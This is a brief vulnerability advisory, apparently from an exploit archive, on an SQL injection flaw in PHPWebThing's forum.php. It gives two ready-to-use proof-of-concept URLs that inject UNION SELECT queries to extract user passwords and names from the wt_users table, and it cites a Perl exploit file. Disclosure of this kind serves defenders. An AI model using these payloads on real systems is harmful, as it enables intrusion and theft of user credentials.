PHPWebThing Forum.PHP SQL Injection Vulnerability

PHPWebThing Forum.PHP SQL Injection Vulnerability

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/forum.php?forum=-1 union select password,password,null,null,null,null from wt_users where uid=1/*

http://www.example.com/forum.php?forum=-1 union select name,name,null,null,null,null from wt_users where uid=1/*

The following proof of concept exploit by AhLaM is available:

/data/vulnerabilities/exploits/phpwebthing-144-sql.pl